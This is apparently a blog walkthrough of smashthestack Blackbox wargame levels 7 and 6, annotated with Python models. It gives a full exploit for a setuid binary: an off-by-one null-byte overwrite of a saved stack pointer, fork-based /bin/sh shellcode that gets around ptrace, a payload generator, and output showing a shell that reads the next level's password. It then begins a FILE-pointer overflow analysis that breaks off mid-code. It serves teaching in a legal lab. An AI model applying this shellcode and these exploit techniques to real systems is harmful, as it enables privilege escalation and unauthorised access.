This just loads eax with the address of argv[1] (again, should be familiar from the previous chapter).

 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>

Now, this is a call to a safe strncpy with the destination being ebp-0x3f0, which we will call from now on buf, the source being argv[1] and the maximum size limit being 0x3e7.
The next piece of code is a bit tricky:

 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax

This is basically an inline implementation of strlen with buf as the argument. For a more in depth explanation of how this works you can check out this article. Bottom line, eax now contains the length of buf, which is the number of bytes until the first string terminator.
However, and this is important, there is an interesting point about strncpy, and that is that if the source string is longer than the limit, it will not terminate the string at the destination. This means that buf will not necessarily have a string terminator inside it, and then strlen will keep searching up the rest of the stack for a 0x00.
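
To see why not/dec on ecx yields the length, here is a small Python 3 model of the repnz scas sequence. It is a sketch of the instruction semantics as I understand them, not a disassembler, and inline_strlen is a made-up name:

```python
def inline_strlen(memory: bytes, start: int = 0) -> int:
    """Model `mov $-1,%ecx; mov $0,%al; repnz scas; mov %ecx,%eax; not %eax; dec %eax`."""
    ecx = 0xFFFFFFFF
    edi = start
    al = 0
    while ecx != 0:
        ecx = (ecx - 1) & 0xFFFFFFFF  # each scas iteration counts ecx down by one
        byte = memory[edi]            # raises IndexError if no 0x00 is ever found
        edi += 1
        if byte == al:                # repnz stops once the byte matches al
            break
    eax = ~ecx & 0xFFFFFFFF           # not %eax: number of bytes scanned, terminator included
    eax = (eax - 1) & 0xFFFFFFFF      # dec %eax: drop the terminator from the count
    return eax


print(inline_strlen(b"heybabe\x00junk after the terminator"))
```

The scan has no upper bound other than ecx itself, so without a terminator inside buf it simply keeps walking up the stack.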

 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00

This writes a 0x00 at buf[len + 1] (note the extra inc), i.e. one byte past the terminator that strlen just found.

 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>

This performs a search on buf for the character '$'=0x24 using strchr, which if successful, returns some non-0 pointer to the character, or NULL on failure.
If the search is successful, i.e. we have a '$' in our buffer, we are turned towards:

 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>

This prints a message and exits. This is important since this path does not lead to a return from main.
If we do not have a '$' in buf, we go to:

 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

Which contains a return from main.
Now, here I'd like to discuss the last few lines of code in detail. The thing is, that when ret is executed, it pops whatever esp points to, and jumps there.
Notice that before the return, esp is loaded with ecx-4, while ecx is popped from the stack.
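Before we continue, I just want to sketch the stack, with offsets relative to ebp as they follow from the prologue and the code above:

ebp+0x4    return address (the copy pushed in the prologue)
ebp        saved ebp
ebp-0x4    saved edi
ebp-0x8    saved ecx
ebp-0x3f0  buf (1000 bytes, up to ebp-0x9)
ebp-0x3fc  copy of ecx (pointer to the arguments)
ebp-0x400  temporary pointer used by the inline strlen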

Now suppose this scenario:

We supply a very long, yet to be determined, argument to the program.
The important thing is that we want ecx to be 0xbfff0100.
This will make strlen stop when it reaches the LSB of the stored ecx, which means that a new 0x00 byte will be written on the second byte of the stored ecx, resulting in 0xbfff0000, which is an address 256 bytes lower than the original ecx.
That address is actually an address inside buf.
At the end of main, that address minus 4 is loaded into esp, so we make sure the word stored there is the address of the bottom of buf.
The bottom of buf itself will contain a shellcode.
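
The scenario can be played through in a small Python 3 model of the relevant stack bytes: buf followed directly by the saved ecx. This is only a sketch; the function name is made up, and the stale parameter is an assumption standing in for whatever non-zero byte happens to sit in the last byte of buf, which strncpy never touches:

```python
import struct

BUF_SIZE = 1000     # buf spans ebp-0x3f0 .. ebp-0x9
COPY_LIMIT = 0x3E7  # the size limit passed to strncpy


def saved_ecx_after_main(arg: bytes, saved_ecx: int, stale: int = 0x41) -> int:
    """Return the saved ecx as it looks after strncpy, strlen and the 0x00 write."""
    mem = bytearray([stale] * BUF_SIZE) + bytearray(struct.pack("<I", saved_ecx))

    # strncpy: copy at most COPY_LIMIT bytes, zero-padding only if arg is shorter.
    n = min(len(arg), COPY_LIMIT)
    mem[:n] = arg[:n]
    mem[n:COPY_LIMIT] = bytes(COPY_LIMIT - n)

    length = mem.index(0)  # inline strlen: offset of the first 0x00 from the start of buf
    mem[length + 1] = 0    # the movb that follows the extra inc
    return struct.unpack_from("<I", mem, BUF_SIZE)[0]


print(hex(saved_ecx_after_main(b"X" * 2000, 0xBFFF0100)))  # long argument
print(hex(saved_ecx_after_main(b"hello", 0xBFFF0100)))     # short argument
```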

So, let's analyze how ecx might be affected. First, let's see what its value is without any arguments:

level7@blackbox:~$ gdb heybabe
GNU gdb 6.4.90-debian
...
(gdb) b main
Breakpoint 1 at 0x8048473
(gdb) run
Starting program: /home/level7/heybabe 

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfffda80:	0xbfffdaa0

We would like that to be 0xbfff0100. So let's try with an argument 0xbfffdaa0-0xbfff0100=0xd9a0 bytes long:

(gdb) run `python -c "print 'a'*0xd9a0"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level7/heybabe `python -c "print 'a'*0xd9a0"`

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfff00e0:	0xbfff0100

Good. You can also see that ebp-8=0xbfff00e0 so ebp=0xbfff00e8.
This means that the tampered ecx will point to ebp-0xe8. So, 4 bytes below that, at ebp-0xec, we should prepare the address ebp-0x3f0=0xbffefcf8.
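
All of these numbers are easy to get wrong by hand, so here is the arithmetic spelled out in Python 3. The constants are the values observed in the gdb sessions above; the variable names are mine:

```python
ECX_NO_ARGS = 0xBFFFDAA0  # saved ecx when run without arguments
ECX_WANTED = 0xBFFF0100   # value whose second byte we want zeroed

pad = ECX_NO_ARGS - ECX_WANTED          # argument length that shifts ecx down to the target
ebp = 0xBFFF00E0 + 8                    # gdb showed the saved ecx at ebp-8 = 0xbfff00e0
tampered_ecx = ECX_WANTED & 0xFFFF00FF  # after the 0x00 lands on the second byte
slot = tampered_ecx - 4                 # the word that ret will pop
buf = ebp - 0x3F0                       # bottom of buf

print("argument length:", hex(pad))
print("tampered ecx   : ebp-" + hex(ebp - tampered_ecx))
print("slot           : ebp-" + hex(ebp - slot))
print("buf            :", hex(buf))
print("slot offset inside buf:", hex(slot - buf))
```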

Now that we have the structure of the payload figured out, we need to figure out the payload.

Remember that the call to ptrace with PTRACE_TRACEME will make the process stop before any call to execve.
How can we circumvent that? Well, the ptrace is active only on the process that called it, so if we were to fork, the child process will not be traced, and can do whatever it wants without any limitations.
So what the shellcode needs to do is fork, the child should call execve, and the parent should wait for the child (this way we can interact with the shell and not cause it to just run in the background).
We want our shellcode to be the equivalent of the following C code:

pid = fork();
if (pid == 0) {
    execve(...);
} else {
    wait(NULL);
}
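
The same fork/exec/wait pattern can be tried out from Python 3 before going down to assembly. This is only an illustration of the control flow: run_in_child is a made-up helper, and it waits for the specific child with waitpid rather than for any child as wait(NULL) does:

```python
import os
import sys


def run_in_child(argv: list) -> int:
    """Fork, exec argv in the child, wait in the parent, and return the child's exit code."""
    pid = os.fork()
    if pid == 0:
        try:
            os.execv(argv[0], argv)  # only returns (by raising) if the exec failed
        finally:
            os._exit(127)            # never fall back into the parent's code
    _, status = os.waitpid(pid, 0)   # the parent blocks until the child is done
    return os.WEXITSTATUS(status)


# The child here is just another Python interpreter exiting with a known code.
print(run_in_child([sys.executable, "-c", "raise SystemExit(7)"]))
```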

We have already worked out the code for the execve in the second chapter. Let's figure out the other two.
Instead of disassembling fork, I'll disassemble vfork, because fork under libc does not use the fork system call, but rather clone (look in notes of the fork man pages).

(gdb) disas vfork
Dump of assembler code for function vfork:
0x00c6f950 <vfork+0>:	pop    %ecx
0x00c6f951 <vfork+1>:	mov    %gs:0x4c,%edx
0x00c6f958 <vfork+8>:	mov    %edx,%eax
0x00c6f95a <vfork+10>:	neg    %eax
0x00c6f95c <vfork+12>:	jne    0xc6f963 <vfork+19>
0x00c6f95e <vfork+14>:	mov    $0x80000000,%eax
0x00c6f963 <vfork+19>:	mov    %eax,%gs:0x4c
0x00c6f969 <vfork+25>:	mov    $0xbe,%eax
0x00c6f96e <vfork+30>:	int    $0x80
...

Now for wait. The thing is, wait is not a system call by itself, wait4 is. The prototype for wait4 is:

pid_t wait4(pid_t pid, int *status, int options, struct rusage *rusage);

So wait(NULL) is equivalent to wait4(-1, NULL, 0, NULL) . Using a pid of -1 means it waits for any child process (from the man page of waitpid).
The disassembly of wait4's wrapper is:

(gdb) disas wait4
Dump of assembler code for function wait4:
0x00c6ef70 <wait4+0>:	push   %esi
0x00c6ef71 <wait4+1>:	push   %ebx
0x00c6ef72 <wait4+2>:	mov    0x18(%esp),%esi
0x00c6ef76 <wait4+6>:	mov    0x14(%esp),%edx
0x00c6ef7a <wait4+10>:	mov    0x10(%esp),%ecx
0x00c6ef7e <wait4+14>:	mov    0xc(%esp),%ebx
0x00c6ef82 <wait4+18>:	mov    $0x72,%eax
0x00c6ef87 <wait4+23>:	int    $0x80
...

So let's write our shellcode and try it out. I've written it with ptrace in the beginning so we can make sure it works under the same constraints as it would in the exploit.

level7@blackbox:/tmp$ cat > shellcode7.c
#include <sys/ptrace.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int pid;
    pid = getpid();
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    __asm__(
        "xorl %eax,%eax\n\t"
        "movb $0xbe,%al\n\t"
        "int $0x80\n\t"
        "test %eax,%eax\n\t"
        "je child\n\t"
        "xorl %eax,%eax\n\t"
        "xorl %ebx,%ebx\n\t"
        "dec %ebx\n\t"
        "xorl %ecx,%ecx\n\t"
        "xorl %edx,%edx\n\t"
        "xorl %esi,%esi\n\t"
        "movb $0x72,%al\n\t"
        "int $0x80\n"
        "child:\n\t"
        "xorl  %eax,%eax\n\t"
        "pushl %eax\n\t"
        "pushl $0x68732f2f\n\t"
        "pushl $0x6e69622f\n\t"
        "movl  %esp, %ebx\n\t"
        "pushl %eax\n\t"
        "pushl %ebx\n\t"
        "movl  %esp, %ecx\n\t"
        "xorl  %edx, %edx\n\t"
        "movb  $0x0b, %al\n\t"
        "int $0x80"
    );
    return 0;
}

level7@blackbox:/tmp$ gcc -o shellcode7 shellcode7.c
level7@blackbox:/tmp$ ./shellcode7
sh-3.1$

It works.
Let's extract the raw code, and embed it in a script:

level7@blackbox:/tmp$ cat > gen7.py
import struct

SHELLCODE = "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd8031c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")
BUF = 0xbffefcf8

ARG = SHELLCODE
ARG += 'X' * (0x3f0 - 0xec - len(ARG))
ARG += struct.pack("<L", BUF)
ARG += 'X' * (0xd9a0 - len(ARG))

print ARG
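
The script above is Python 2. For reference, a rough Python 3 port of the same layout might look like this. The function name build_arg and the two sanity checks are my additions; the checks confirm that the argument contains no 0x00 (which would end argv[1] early) and no '$' (which the strchr test rejects):

```python
import struct

SHELLCODE = bytes.fromhex(
    "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd80"
    "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80"
)
BUF = 0xBFFEFCF8           # address of the bottom of buf, as worked out above
SLOT_OFFSET = 0x3F0 - 0xEC  # offset inside buf of the word that ret will pop
TOTAL = 0xD9A0             # argument length that moves the saved ecx to 0xbfff0100


def build_arg() -> bytes:
    """Shellcode, padding, the address of buf at the slot, then padding to TOTAL bytes."""
    arg = SHELLCODE
    arg += b"X" * (SLOT_OFFSET - len(arg))
    arg += struct.pack("<I", BUF)  # little-endian 32-bit address
    arg += b"X" * (TOTAL - len(arg))
    return arg


arg = build_arg()
assert b"\x00" not in arg and b"$" not in arg
print(len(arg), "bytes, address stored at offset", hex(SLOT_OFFSET))
```

To actually emit the bytes under Python 3, write them with sys.stdout.buffer.write(build_arg()) instead of print, since print would try to treat them as text.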

Show time:

level7@blackbox:~$ ~/heybabe `python /tmp/gen7.py`
Walk the way of the 1337 one!1���̀��t1�1�K1�1�1��r̀1�Ph//shh/bin��PS��1Ұ
                                                                      XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX����XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXsh-3.1$ 
sh-3.1$ cat /home/level8/password
????????????

On to the next level (sorry for the spam there, but that IS the output)

Friday, January 27, 2012

Blackbox - chapter 6

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Level 6. You should know the drill by now:

$ ssh -p 2225 level6@blackbox.smashthestack.org
level6@blackbox.smashthestack.org's password:
...
level6@blackbox:~$ ls -l
total 16
-rwsr-xr-x 1 level7 level7 7599 2008-01-24 05:09 fsp
-rw-r--r-- 1 root   level6   13 2007-12-29 14:10 password
-rw-r--r-- 1 root   root     32 2008-01-24 05:04 temp

Ah...no source file this time. Well, looks like we will have to make do with what we have.
Usually we start off with a disassembly of the .text section, but this time I'd like to start with the .rodata section, because we will need it to better understand the disassembled code:

level6@blackbox:~$ objdump -s --section=.rodata fsp

fsp:     file format elf32-i386

Contents of section .rodata:
 8048610 03000000 01000200 75736167 65203a20  ........usage : 
 8048620 2573203c 61726775 6d656e74 3e0a0061  %s <argument>..a
 8048630 0074656d 70006e6f 20736567 6661756c  .temp.no segfaul
 8048640 74207965 740a00                      t yet..

Here, I've even colored the relevant strings. Let's just make a little summary of addresses and the strings they contain:

8048618: usage : %s <argument>
804862f: a
8048631: temp
8048636: no segfault yet
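
The same summary can be produced mechanically. Below is a minimal sketch (Python 3, unlike the Python 2 scripts used on the box) that walks the bytes from the dump above and reports every NUL-terminated printable run with its address. The helper name find_strings is my own, not something from objdump or any library.

```python
# Bytes of .rodata exactly as shown in the objdump output above.
RODATA_BASE = 0x8048610
RODATA_HEX = (
    "03000000 01000200 75736167 65203a20"
    "2573203c 61726775 6d656e74 3e0a0061"
    "0074656d 70006e6f 20736567 6661756c"
    "74207965 740a00"
)


def find_strings(base, data, min_len=1):
    """Return (address, text) for every NUL-terminated printable run."""
    found, start = [], None
    for offset, byte in enumerate(data):
        printable = 0x20 <= byte < 0x7f or byte == 0x0a
        if printable and start is None:
            start = offset              # a new candidate string begins here
        elif not printable:
            # Only keep the run if it is closed by a NUL terminator.
            if start is not None and byte == 0 and offset - start >= min_len:
                text = data[start:offset].decode("ascii")
                found.append((base + start, text))
            start = None
    return found


data = bytes.fromhex(RODATA_HEX.replace(" ", ""))
strings = find_strings(RODATA_BASE, data)
for address, text in strings:
    print("%x: %r" % (address, text))
```

The trailing newlines show up in the printed strings as \n, which is why the usage and "no segfault yet" entries are one byte longer than they look in the summary.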

Now we'll disassemble main from the .text section, and I'll go ahead and annotate the places that reference the above addresses:

level6@blackbox:~$ objdump -d fsp|grep -A49 "<main>:"
08048444 <main>:
 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048448: 83 e4 f0              and    $0xfffffff0,%esp
 804844b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804844e: 55                    push   %ebp
 804844f: 89 e5                 mov    %esp,%ebp
 8048451: 51                    push   %ecx
 8048452: 81 ec 34 04 00 00     sub    $0x434,%esp
 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)
 804845e: a1 36 86 04 08        mov    0x8048636,%eax          ;"no segfault yet"
 8048463: 89 45 e7              mov    %eax,0xffffffe7(%ebp)
 8048466: a1 3a 86 04 08        mov    0x804863a,%eax          ;"egfault yet"
 804846b: 89 45 eb              mov    %eax,0xffffffeb(%ebp)
 804846e: a1 3e 86 04 08        mov    0x804863e,%eax          ;"ult yet"
 8048473: 89 45 ef              mov    %eax,0xffffffef(%ebp)
 8048476: a1 42 86 04 08        mov    0x8048642,%eax          ;"yet"
 804847b: 89 45 f3              mov    %eax,0xfffffff3(%ebp)
 804847e: 0f b6 05 46 86 04 08  movzbl 0x8048646,%eax          ;"\0"
 8048485: 88 45 f7              mov    %al,0xfffffff7(%ebp)
 8048488: 8b 85 d8 fb ff ff     mov    0xfffffbd8(%ebp),%eax
 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>
 8048493: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 8048499: 8b 42 04              mov    0x4(%edx),%eax
 804849c: 8b 00                 mov    (%eax),%eax
 804849e: 89 44 24 04           mov    %eax,0x4(%esp)
 80484a2: c7 04 24 18 86 04 08  movl   $0x8048618,(%esp)       ;"usage : %s <argument>"
 80484a9: e8 9a fe ff ff        call   8048348 <printf@plt>
 80484ae: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484b5: e8 9e fe ff ff        call   8048358 <exit@plt>
 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)
 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)
 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>
 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>
 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>

Now, one thing that should serve to guide us is that there is no return from main, only exit calls. This means that overwriting the return address will be of no use here.
Bearing that in mind, let's first reconstruct the image of the stack while trying to understand what the program does:

 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx

This means ecx points to the first argument of main, which is argc. A few lines later we can see:

 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)

Which means that the address of argc is stored in ebp-0x428.
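
This old objdump prints negative displacements as unsigned 32-bit numbers, so it helps to convert them once and for all. A small sketch (Python 3; the function name as_signed32 is just something I made up for illustration):

```python
def as_signed32(value):
    """Interpret a 32-bit unsigned value as a two's-complement signed one."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


# Displacements copied from the disassembly of main.
for raw in (0xfffffbd8, 0xfffffbe7, 0xffffffe7, 0xfffffff8):
    disp = as_signed32(raw)
    print("0x%08x(%%ebp) -> ebp%+#x" % (raw, disp))
```

These four displacements are the ones that matter in main: the saved address of argc, the strcpy destination, the local copy of the string constant, and the slot that receives the return value of fopen.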
We then have:

 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>

This just checks that argc is greater than 1, i.e. that at least one argument was given to the program. If so, execution jumps to the rest of main; otherwise the usage message is printed and the program exits with -1.
What happens in the main flow is pretty straightforward:

 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)

This opens the file called temp in append mode, and puts the return value (which is fp) in ebp-0x8.
Next piece of code is:

 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)

This loads the address of argc into edx, then loads the value stored 4 bytes above that address, which is argv, into eax. At this point eax holds &argv[0]; adding 4 makes it &argv[1], and dereferencing that leaves argv[1] itself in eax. That pointer is stored at esp+0x4, which makes it the second argument to a function (which is about to be called):

 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>

This loads the first argument with ebp-0x419, which is just some address within the stack which we can call buf, and then calls strcpy. Effectively, argv[1] is copied into buf, and might I also add that it does so in an unsafe fashion.
What it does next is:

 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>

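That's loading fp as the second argument, and the address ebp-0x19 as the first argument, and calling fputs. Note that ebp-0x19 is not buf (which sits at ebp-0x419) but the local copy of "no segfault yet" that was made at the top of main, so this is the string that gets written to temp.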
After that, the program just exits with 0:

 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>

Just to put it all together, here's a picture of the stack-frame:

Well, the only interesting things we can overwrite by exploiting the unsafe strcpy are fp and the return address, and since main never returns but rather exits, we are left with fp only. Let's work with that.
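
The frame layout can also be written down directly from the displacements in the disassembly. This is a sketch in Python 3 under my own assumptions: the labels "msg" and "saved &argc" are names I picked, and the 0x400 size of buf is inferred from the gap between ebp-0x419 and ebp-0x19, since there is no source to confirm it.

```python
# (label, offset from ebp, size in bytes), read off the disassembly of main.
FRAME = [
    ("saved &argc", -0x428, 4),      # mov %ecx,0xfffffbd8(%ebp)
    ("buf",         -0x419, 0x400),  # strcpy destination (size inferred)
    ("msg",         -0x19,  0x11),   # copy of "no segfault yet\n" plus NUL
    ("fp",          -0x8,   4),      # return value of fopen
]


def bytes_to_reach(frame, source, target):
    """Number of bytes written from `source` before `target` is touched."""
    offsets = {name: offset for name, offset, _ in frame}
    return offsets[target] - offsets[source]


# Print from the highest address down, the way a stack is usually drawn.
for name, offset, size in sorted(FRAME, key=lambda e: e[1], reverse=True):
    print("ebp%+#x  %-12s %#x bytes" % (offset, name, size))

print("bytes from buf to fp: %#x" % bytes_to_reach(FRAME, "buf", "fp"))
```

The last line is the number that matters for the overflow: anything copied past that many bytes lands on fp.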
The only place where fp is used after being returned from fopen is fputs, so let's see what happens there. Since the executable is not statically linked, I will use gdb to disassemble fputs (cropped to the interesting parts only):

level6@blackbox:~$ gdb fsp
...
(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run
Starting program: /home/level6/fsp 

Breakpoint 1, 0x08048452 in main ()
(gdb) disassemble fputs
Dump of assembler code for function fputs:
0x001b24a0 <fputs+0>:   push   %ebp
0x001b24a1 <fputs+1>:   mov    %esp,%ebp
0x001b24a3 <fputs+3>:   sub    $0x1c,%esp
0x001b24a6 <fputs+6>:   mov    %ebx,0xfffffff4(%ebp)
0x001b24a9 <fputs+9>:   mov    0x8(%ebp),%eax
0x001b24ac <fputs+12>:  call   0x170d10 <free@plt+112>
0x001b24b1 <fputs+17>:  add    $0xd7b43,%ebx
0x001b24b7 <fputs+23>:  mov    %esi,0xfffffff8(%ebp)
0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi
0x001b24bd <fputs+29>:  mov    %edi,0xfffffffc(%ebp)
0x001b24c0 <fputs+32>:  mov    %eax,(%esp)
0x001b24c3 <fputs+35>:  call   0x1c7e30 <strlen>
0x001b24c8 <fputs+40>:  mov    %eax,0xfffffff0(%ebp)
0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>
...
0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>
0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax
0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)
...

Let's see what happens here. First, inside the function, the first parameter, the string to write, is at ebp+0x8, and the second, fp, is at ebp+0xc. We don't care about the string, only fp.
So the first thing that happens with fp is:

0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi

This just stores fp in esi, so we have to keep our eyes open to esi references as well. Next:

0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>

This looks familiar from the previous level. It tests whether the first long word of the FILE structure pointed to by fp has a certain flag (0x8000) set. If it is set, the program will move in a direction desirable to us:

0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>

This checks whether the byte at offset 0x46 from fp is 0x00, and jumps to some other location if it is. We do not want it to jump there, so we will make sure there is something non-zero at that offset.
The next piece of code is:

0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax

What happens here is that the byte at fp+0x46 is copied into eax with sign extension to 32 bits (so for a small positive value such as 0x01 the rest of eax is zeroed out). That value is then used as a byte offset from fp+0x94, and the long word found there is copied to eax.
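
To make the sign extension and the address arithmetic concrete, here is a rough Python 3 model of those two instructions. The function names are my own, and this only models the arithmetic, not the memory access itself.

```python
def movsbl(byte):
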